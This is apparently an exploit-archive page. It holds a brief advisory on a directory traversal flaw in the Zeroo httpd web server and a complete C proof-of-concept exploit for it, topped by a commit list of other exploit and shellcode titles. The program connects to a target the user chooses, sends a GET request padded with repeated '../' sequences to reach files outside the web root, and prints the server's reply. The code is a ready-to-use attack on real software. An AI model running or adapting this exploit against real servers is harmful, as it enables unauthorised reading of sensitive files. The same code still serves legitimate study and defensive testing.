880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
115 lines
No EOL
3.5 KiB
C
115 lines
No EOL
3.5 KiB
C
// source: https://www.securityfocus.com/bid/6308/info
|
|
|
|
It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root.
|
|
|
|
An attacker is able to traverse outside of the established web root by using dot-dot-slash (../) directory traversal sequences. An attacker may be able to obtain any web server readable files from outside of the web root directory.
|
|
|
|
/*
|
|
* zeroo httpd remote directory traversal exploit
|
|
* proof of concept
|
|
* hehe, just a copy and paste from my other directory
|
|
* traversal exploit ;p
|
|
* [mikecc] [http://uc.zemos.net/]
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
#include <arpa/inet.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <netdb.h>
|
|
#include <unistd.h>
|
|
|
|
#define FOO "../"
|
|
|
|
void get(int sd);
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
struct sockaddr_in sock;
|
|
struct hostent *pHe;
|
|
int sd;
|
|
int amt;
|
|
char * host;
|
|
char * file;
|
|
short port;
|
|
char expstr[1024];
|
|
int x;
|
|
char * baz;
|
|
|
|
printf("UC-zeroo\n");
|
|
printf("zeroo httpd remote exploit\n");
|
|
printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
|
|
if (argc != 5)
|
|
{
|
|
printf("%s host port file traverse_amount (>= 1 [keep incrementing till hit])\n",argv[0]);
|
|
return 0;
|
|
}
|
|
host = argv[1];
|
|
port = atoi(argv[2]);
|
|
file = argv[3];
|
|
amt = atoi(argv[4]);
|
|
if ((pHe = gethostbyname(host)) == NULL)
|
|
{
|
|
printf("Host lookup error.\n");
|
|
return 0;
|
|
}
|
|
if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
|
|
{
|
|
printf("sock() failed.\n");
|
|
return 0;
|
|
}
|
|
sock.sin_family = AF_INET;
|
|
sock.sin_port = htons(port);
|
|
memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
|
|
printf("Connecting...\n");
|
|
if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
|
|
{
|
|
printf("Failed to connect to %s.\n",host);
|
|
return 0;
|
|
}
|
|
printf("Setting up exploit string..\n");
|
|
if ((amt + 8 + strlen(file)) > 1024)
|
|
{
|
|
printf("Error. Limit 1024 characters.\n");
|
|
return 0;
|
|
}
|
|
sprintf(expstr,"GET /");
|
|
for (x = 0; x < amt; x++)
|
|
{
|
|
strcat(expstr,FOO);
|
|
}
|
|
printf("\tInserting file string..\n");
|
|
strcat(expstr,file);
|
|
strcat(expstr,"\n\n");
|
|
printf("Sending exploit string...\n");
|
|
write(sd,expstr,strlen(expstr));
|
|
get(sd);
|
|
close(sd);
|
|
return 0;
|
|
}
|
|
|
|
void get(int sd)
|
|
{
|
|
char buf[1024];
|
|
int x;
|
|
fd_set rset;
|
|
|
|
FD_ZERO(&rset);
|
|
while (1)
|
|
{
|
|
FD_SET(sd,&rset);
|
|
select(sd+1,&rset,0,0,0);
|
|
if (FD_ISSET(sd,&rset))
|
|
{
|
|
if ((x = read(sd,buf,1024)) == 0)
|
|
{
|
|
printf("Connection closed by foreign host.\n");
|
|
exit(1);
|
|
}
|
|
buf[x] = 0; /* clean out junk */
|
|
printf("%s\n",buf);
|
|
}
|
|
}
|
|
} |